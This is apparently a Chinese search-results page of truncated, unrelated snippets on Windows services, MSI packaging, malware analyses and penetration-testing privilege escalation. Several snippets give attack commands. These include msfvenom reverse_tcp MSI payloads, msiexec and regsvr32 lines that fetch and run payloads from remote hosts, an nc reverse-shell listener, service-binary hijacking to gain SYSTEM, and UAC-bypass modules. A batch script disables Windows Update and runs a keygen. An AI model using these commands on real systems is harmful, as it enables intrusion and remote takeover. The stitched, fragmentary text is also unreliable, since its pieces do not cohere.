这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面。这种服务非常适合在服务器上使用,或任何时候,为了不影响在同一台计算机上工作的其他用户,需要长时间运行功能时使用。...还可以在不同登录用户的特定用户帐户或默认计算机帐户的安全上下文中运行服务。Windows服务(Windows Services)通常使用本地系统账户启动。...如果我们拥有可以修改服务配置权限的话,可以将服务启动的二进制文件替换成恶意的二进制文件,重新启动服务后执行恶意的二进制文件,可以获取到system权限。...1)停止USOSVC 服务 PS C:\Windows\system32> sc stop UsoSvc 2)将服务执行的exe文件修改为nc,反弹shell PS C:\Windows\system32...3.在攻击机启动监听,获取反弹shell。 ?
一、Microsoft Windows Installer 如果软件是用 Windows Installer 打包的,可以在文件夹中看到 *.msi 后缀的文件。...为了阻止某些程序安装成功后自动重启动(例如 Kerio Personal Firewall 4),你可以在 /qn 或者 /qb 参数后使用 REBOOT=Suppress 标记。...有一点非常重要,在安装结束后不能选择“立刻重启动计算机”。如果选了,在批处理文件中的其他命令就会因为计算机重启动而无法执行。...四、InstallShield with MSI InstallShield with MSI 制作的安装文件,请使用类似:setup.exe /s /v "/qb" 来安装。...: /T 测试模式 /X 路径名 将文件提取到路径名中 /Z 路径名 将文件提取到路径名并重新启动 /S 静默安装 /M 提示输入windows、system、temp目录(/M=文件名-指定一个类似于
第四步,添加卸载程序 既然有安装就有卸载,卸载程序其实是一个Windows操作系统自带的程序(C:Windows\System32\Msiexec.exe),只不过是通过给它传特殊的参数命令,来让它执行卸载...添加和设置卸载程序的操作如下: 首先,将卸载程序放在“应用程序文件夹”目录下,右键“应用程序文件夹”,添加——文件,在系统盘下找到这个路径文件——C:Windows\System32\Msiexec.exe...(比如要求必须先安装指定的.net FrameWork版本才可以启动)等,可以右键安装项目,在View中可以进行选择设置,如下 ?...选择“从组件供应商的网站上下载系统必备组件”,这样一来,即使电脑上没有安装需要的.net Framework也不要紧,只要设置了这项,安装程序会自动从微软的官网上下载对应的组件并安装,是不是很方便 第七步...生成的setup.exe与setup.msi的区别 setup.exe里边包含了对安装程序的一些条件的检测,比如需要.net的版本是否安装等,当条件具备后,setup.exe接着调用setup.msi,
Purple Fox于 2018 年 3 月首次被发现,并以名为“.msi ”软件包的形式在互联网分发。当时,专家们在近 2000 台受感染的 Windows 服务器上发现了该软件包。...执行时,TextInputh.exe会继续在C:\Users\Public\Videos\目录下创建一个名为“1640618495”的文件夹,然后从C2服务器将“1.rar”、“7zz.exe”文件下载到新建的文件夹中...· exe – 这个文件被用来关闭和阻止 360 AV 的启动 · sys – 删除此文件后,会在受感染的 PC 上创建并启动一个名为“Driver”的新系统驱动程序服务,并在 ProgramData...· hg – SQLite 文件 上述文件被用来阻止 360 AV 进程的启动,最终阻止检测的有效载荷,也就顺理成章实现了Purple Fox 的后门功能。...最后一步也是最关键的一步,Purple Fox被作为 .msi 文件从 C2 服务器下载,用于系统加密的 shellcode也一并被下载下来。
,用户会通过 hxxps://team-viewer.site/download/Team-Viewer.msi下载恶意文件 Team-Viewer.msi。...绕过防御 .msi是第一阶段的 Dropper,在目录中创建随机合法文件 C:\Program Files (x86)\Sun Technology Network\Oracle Java SE。...提权 nsudo.bat通过验证对 SYSTEM 配置单元的访问权限来检查当前的执行上下文是否具有权限。...该脚本 autorun100.bat下载文件并放置在启动文件夹 %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup...,该脚本确保 WinDefend 服务在下次启动时被删除。
0x00 前言 在渗透测试中,某些情况下需要用到system权限,例如操作注册表HKEY_LOCAL_MACHINE\SAM\SAM 恰巧最近看到了一篇文章介绍了几种获得system权限的方法,于是决定结合自己的经验对这方面的技巧做系统整理...命令: 创建服务,以system权限启动: schtasks /Create /TN TestService2 /SC DAILY /ST 00:36 /TR notepad.exe /RU SYSTEM...权限启动: psexec.exe -accepteula -s -d notepad.exe 默认情况下,system权限的进程不会在用户桌面显示,如果需要显示进程界面,可以加/i参数,命令如下: psexec.exe...msigen.msi文件会报错,如下图 使用light.exe能够成功生成msigen.msi,如下图 虽然报错,但不影响文件的生成和功能的执行 也就是说,完整编译命令如下: 直接双击执行msigen.msi...会弹框,启动的calc.exe为system权限 命令行下执行: msiexec /q /i msigen.msi 启动的calc.exe为high权限 0x04 利用token复制获得System权限
如果我们能构造一个msi包,里面包含里想要执行的payload,Payload将获得System权限,下面演示两个工具构造MSI包进行提权。...msfvenom -p windows/exec CMD="calc.exe" -f msi -o UserAdd.msi ?...我用psexec.exe -accepteula -s -i -d cmd.exe在本地开了一个nt authority\system的cmd: ?...因为Windows Management Instrumentation服务启动类型是自动,这里停止之后自动启动,在 ProcessMonitor的Filter配置为Process Name 为wmiprvse.exe...可以看到首先尝试在C:\Windows\System32\wbem寻找wbemcomn.dll,结果为Name Not FOUND,因为wmiprvse.exe所在的目录就是C:\Windows\System32
技 术 分 析部署在开始在域中大规模感染之前,攻击者在域控制器中部署了以下恶意软件文件:·.bat 一个BAT脚本,负责检查安全解决方案的存在,并开始执行一个微软安装程序(.msi)·在整个域中执行。执行msi安装程序包含四个文件:·SapphireIMSClient.exe,这个可执行文件是NTSD.exe--一个用于Windows的符号调试器工具。.../system.cpp)中的代码有高度的相似性。...MTD在不影响可用性的情况下提出诱饵来欺骗和诱捕威胁。它阻止并暴露了依赖内存中动态执行的隐蔽性的攻击者。...市场领先的EDR,如CrowdStrike和SentinelOne,在攻击发生时无法阻止新的Babuk变体。
vs 下载扩展 搜索创建msi文件即可 利用文件系统和自定义操作选项,可以设置将在目标主机上释放的文件和执行的命令 点击项目输出 打包exe进msi 可以添加图标 创建快捷方式...在扩展中可以对安装包的属性进行设置,部分属性会在msi文件的详细信息中体现,所以可以对属性进行一些伪造欺骗 如果选择True时,在管理员权限下msiexec会使用SYSTEM权限执行安装: 启动条件...点击view->启动条件 可以设置硬件属性中的内存、分辨率来检测是否在虚拟机里启动 比如这里要求物理内存必须大于多少字节才启动安装包 可以通过orca.exe来查看其他软件的启动条件设置,下载链接.../t5/InstallShield-Knowledge-Base/Common-MSI-Conditions/ta-p/3854 在安装时可以使用msiexec /q /i MsiexecSetup.msi.../log 123.log方式输出日志文件,通过对比日志文件进行更详细的条件设置 打包exe/二进制文件 MSI安装包中可以添加exe、dll、vbs、js类型二进制文件或脚本。
安装社区版MongoDB 注意 您还可以使用完全托管数据库服务Atlas在微软云(Azure)上启动MongoDB。Atlas使您可以从免费沙箱环境配置一切内容到全局分片生产集群。...在Version下拉列表中,选择最新MongoDB Server 4.0版本。 c. 在OS下拉列表中, 应选择Windows 64位X64。 d. 在Package 下拉列表中,应选择MSI。...从MongoDB 4.0开始,您可以在安装期间配置和启动MongoDB作为服务,并在成功安装后启动MongoDB服务。 选择将MongoD安装为服务。...要启动MongoDB,请运行mongod.exe。...的“某些功能” 在网络上进行通信被阻止。
利用方式: #把服务启动的行为(exe或者脚本,com组件..)替换成我们的MSF反弹木马,当服务重启时,就会给我们返回一个system权限的meterpreter set AutoRunScript...简介:windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的时间执行程序或脚本(在大多数情况下,计划任务是以NT Authority\System高权限执行的),...文件,msi文件内包含要执行的Payload,Payload将会以System权限执行 msiexec /quiet /qn /i muma.msi #msf 需要一个会话 run exploit...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件...如果指定EXE ::Custom,则应在单独的进程中启动payload后调用ExitProcess() exploit/windows/local/bypassuac_comhijack#此模块将通过在
,注意"="后需要有一个空格, #在远程主机上创建一个名为schtasksname的系统服务,服务启动时将执行上传的攻击载荷 sc \\10.10.10.19 start schtasksname..."C:\Windows\System32\cmd.exe /c C:\Windows\System32\regsvr.32.exe /s /n /u /i:http://192.168.2.143:8080...,禁止弹出许可证对话框;-u,指定远程主机的用户名;-p,指定用户的密码 #-S,以SYSTEM权限启动进程,如果未指定该参数,就将以管理员权限启动进程 在内网渗透中,如果已建立IPC$链接,那么可以直接使用...MSI; 二是远程部署WMI事件订阅,在特定条的事件发生时触发攻击。...4444 -f msi -o reverse_tcp.msi ③在一台测试人员可控的服务器上搭建SMB共享服务器,并将生成的MSI文件放入共享目录 mkdir /root/share python smbserver.py
利用方式: #把服务启动的行为(exe或者脚本,com组件..)替换成我们的MSF反弹木马,当服务重启时,就会给我们返回一个system权限的meterpreter set AutoRunScript...这是因为当一个服务在Windows系统中启动后,它必须和服务控制管理器通信,如果没有通信,服务控制管理器会认为出现了错误,并会终止这个进程,我们所有需要做的就是在终止载荷进程之前,将它迁移到其它进程。...文件,msi文件内包含要执行的Payload,Payload将会以System权限执行 msiexec /quiet /qn /i muma.msi #msf 需要一个会话 run exploit...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件...如果指定EXE ::Custom,则应在单独的进程中启动payload后调用ExitProcess() exploit/windows/local/bypassuac_comhijack#此模块将通过在
线程调度时上一个线程的CPU寄存器的状态会保存到该线程上下文中。...,在下一个线程执行代码和访问数据前将前一个线程的上下文会复制到下一个线程的上下文中,然后执行下一个线程。...因上下文流动会降低一定的性能,所以在需要的情况下可以阻止上下文流动(如下一个线程执行不需要上一个线程的上下文信息)。...下面提供两种方法实现阻止上下文流动:1,使用线程池System.Threading.ThreadPool.UnsafeQueueUserWorkItem方法调用另一个线程来执行代码;2,使用System.Threading.ExecutionContext.SuppressFlow...方法来阻止当前线程将上下文复制到下一个线程的上下文。
系统服务的错误权限配置漏洞 Windows系统服务文件在操作系统启动时会加载执行,并且在后台调用可执行文件。...BINARY_PATH_NAME参数指向了该服务的可执行程序(360rps.exe)路径。如果我们将这个值修改成任何命令,那意味着这个命令在该服务下一次启动时,将会以SYSTEM权限运行。 ?...当尝试启动服务时,它会返回一个错误。这一点我们之前已经讨论过了,在Windows系统中,当一个服务在Windows系统中启动后,它必须和服务控制管理器通信。...system权限运行MSI文件。...如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。
在Kaspersky AVP.exe进程尝试加载缺少的wow64log.dllDLL文件(在System32)。...通过DLL植入恶意文件,本地Windows管理员可以在这个受信任的AVP.exe进程的上下文中实现代码执行并杀死其他进程,从而在无法检测和清除病毒的杀毒软件上实现拒绝服务和以卡巴斯基的身份执行任意命令。...Service启动的进程为: ProCess Monitor AVP.exe 加载不存在的wow64log.dll,路径为C:\windows\System32\ Avpui.exe同样加载不存在的...但似乎卡巴斯基家族的所有进程都认为其他卡巴斯基进程在自我保护方面是“受信任的”。因此,如果我们设法在一个上下文中执行代码,我们就可以“攻击”并杀死其进程和在卡巴斯基中执行任意命令等等。...也可以在卡巴是安全上下文中执行我们的shellcode 例如:
端成功收到反弹的shell msiexec msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要...> evil.msi Step 2:使用python开启一个简易的web服务器用于托管msi载荷 Step 3:在攻击主机上使用nc监听端口 nc -lvp 6666 Step 4:在目标主机中执行以下命令实现无文件落地执行载荷...msiexec /q /i http://192.168.174.129:1234/evil.msi Step 5:之后再web端成功接收到请求记录,同时在NC端返回cmd命令交互 mshta mshta.exe...在windows\system32文件夹下,2000系统的regsvr32.exe在winnt\system32文件夹下,我们可以通过该命令来实现无文件落地攻击,和上面类似这里也借助JSRat来实现,首先我们在本地运行...-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f exe >shell.exe Step 2:启动MSF
Step 2:在msf中启动监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST...Step 3:使用python启动一个简易的Web服务器用于托管shell.exe python2 -m SimpleHTTPServer 1234 ?...Step 2:使用python开启一个简易的web服务器用于托管msi载荷 ? Step 3:在攻击主机上使用nc监听端口 nc -lvp 6666 ?...\system32文件夹下,2000系统的regsvr32.exe在winnt\system32文件夹下,我们可以通过该命令来实现无文件落地攻击,和上面类似这里也借助JSRat来实现,首先我们在本地运行...Step 2:启动MSF框架并设置监听 ? Step 3:将shell.exe文件传送到Windows Server 2008 R2的c盘 ?
start= disabled //禁止windows更新服务 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.../S /v/qn //静默安装 start /wait keymaker.exe //启动注册机 C:\Windows\SysWOW64\rserver30\rserver30.exe.../setup //启动设置界面 echo SUCCESS!!...pause 再提供一个msi包的静默安装方法 @echo off echo wait......." /v disablecad /t REG_DWORD /d 1 /f rem gpupdate /force echo install radmin radmin.msi /quiet
领取专属 10元无门槛券
手把手带您无忧上云